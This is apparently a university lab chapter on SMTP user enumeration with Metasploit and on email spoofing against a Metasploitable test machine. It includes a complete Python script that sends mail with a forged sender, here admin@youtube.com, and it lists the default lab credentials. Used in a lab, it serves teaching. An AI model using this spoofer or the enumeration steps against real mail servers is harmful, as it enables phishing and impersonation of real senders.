Chapter 9 SMTP enurmeration & email spoofing

9.1 Background

For this lab you are going to attempt to build an email address spoofer that implements the STMP protocol over TCP. Modern Email servers have several solutions to make it more difficult to spoof emails. However, the STMP protocol itself does not check to ensure that the message is coming from a valid server or that email was actually created by the sender. To demonstrate this, we will setup up a metasploitable server.

9.2 SMTP enumeration

In an SMTP enumeration attack an attacker try get a list of valid email addresses from a server. Kali linux has

Step 1 determine the ipaddress of the metasploitable machine using the ipconfig command. Username: msfasdmin password msfadmin

Step 2 Start the metasploit console. Select smtp_enum module by typing the following

msf > use auxiliary/scanner/smtp/smtp_enum

Step 3 Set the host that you want to scan by typing the following. Replace the xxx.xxx.xxx.xxx ip-address with IP-address of the metasploitable machine

msf auxiliary(smtp_enum) > set RHOSTS xxx.xxx.xxx.xxx

RHOSTS => 192.168.1.56

msf auxiliary(smtp_enum) > run

You should see a list of users on the server.

[Include screenshot below]

An attacker could you use an SMTP enumeration attack to get the email address that are available on the server. In the following section we develop software required to execute an SMTP attack.

9.3 Email Spoofing

Step 1. Download the free version of vmplayer. (You can also use virtual box if you already have it installed or just like it more.)

Step 2. Connect to the metasploitable server via telnet.

telnet xxx.xx.xx.x 25

where xx.xx.xx.x is the IP address of the metasploitable server.

Remember that you can get the address of the metasploitable server by login: username msfadmin and password msfadmin

The metasploitable webserver will now let you communicate with it via telnet. (Not encrypted fun for snooping)

Step 3 Follow the STMP communication protocol process to send an email to from the hacking@virginia.edu (The figure below shows the results of process)

Great, now that we have a mailserver that is configured and we can communicate with. Let’s go ahead write a TCP application that will allow us to implement the process for us.

Step 4 Open the ide

The code below shows an implementation of the program that execute the SMTP protocol over a TCP connection


import sys, socket

size = 1024


def sendMessage(smtpServer, port, fromAddress, toAddress, message):
    IP = smtpServer
    PORT = int(port)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((IP, PORT))  # Open socket on port
    print(s.recv(size).decode())  # display response
    s.send(b'HELO virginia.edu\n')  # Send HELO fake.fr
    print(s.recv(size).decode())  # display response
    s.send(b'MAIL FROM:<' + fromAddress.encode() + b'>\n')  # send MAIL FROM: 
    print(s.recv(size).decode())  # display response
    s.send(b'RCPT TO:<' + toAddress.encode() + b'>\n')  # send RCPT TO: 
    print(s.recv(size).decode())  # display response
    s.send(b"DATA\n")  # send DATA
    print(s.recv(size).decode())  # display response
    s.send(message.encode() + b'\n')  # send message
    s.send(b'.\n')
    print(s.recv(size).decode())  # display response
    s.send(b'QUIT\n')  # send QUIT
    print(s.recv(size).decode())  # display response
    s.close()


def main(args):
    smtpServer = args[1]
    port = args[2]
    fromAddress = args[3]
    toAddress = args[4]
    message = args[5]
    sendMessage(smtpServer, port, fromAddress, toAddress, message)


if __name__ == "__main__":
    main(sys.argv)

Step 5 Create a folder called spoofer on the Kali desktop and save the program above to the folder and call it espoofer.py

Step 6 Open the terminal and cd to ~/Desktop/spoofer

Step 7 Run the spoofer by typing the following commands into the termainal on the shell.


python espoofer.py [IP-Metasploitable] 25 admin@youtube.com sys  Hello From the other side

[Include screen shot]

9.4 Checking to see that email was correctly recieved.

Step 1 Login into the metasploitable server. Username: msfadmin Password: msfadmin

Step 2 Open the terminal and check sys mailbox on the mail server by typing

sudo cat /var/spool/mail/sys

[Include a screen shot below]